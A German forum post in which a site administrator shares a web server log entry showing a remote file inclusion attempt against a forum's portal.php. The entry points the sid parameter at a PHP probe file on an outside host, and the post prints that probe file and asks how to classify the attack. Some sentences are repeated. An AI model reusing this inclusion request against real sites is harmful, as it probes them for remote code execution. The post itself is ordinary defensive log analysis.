Bei meiner heutigen Logfile Kontrolle hab ich mal wieder recht interessante Requests gefunden. Die heutige mir bisher unbekannte Variante:
Mal abgesehen davon, das der Ordner wbb2 nicht existiert und alle Requests dieser Art mit 404 beantwortet wurden, hier mal noch der Inhalt der Textdatei, die per Querystring an die portal.php übergeben werden sollte:
Mir scheint da hat jemand (manuell?) getestet oder vorbereitet ...
Unter welcher Kategorie laufen solche Requests? Cross-Site Scripting oder .. Forgery? Sind euch solche Requests auch schon untergekommen?
Code:
x.x.x.x - - [03/Mar/2010:01:00:01 +0100] "GET //wbb2/portal.php?sid=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
Mal abgesehen davon, das der Ordner wbb2 nicht existiert und alle Requests dieser Art mit 404 beantwortet wurden, hier mal noch der Inhalt der Textdatei, die per Querystring an die portal.php übergeben werden sollte:
zfxid.txt
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
Mir scheint da hat jemand (manuell?) getestet oder vorbereitet ...
Unter welcher Kategorie laufen solche Requests? Cross-Site Scripting oder .. Forgery? Sind euch solche Requests auch schon untergekommen?
Last edited by a moderator: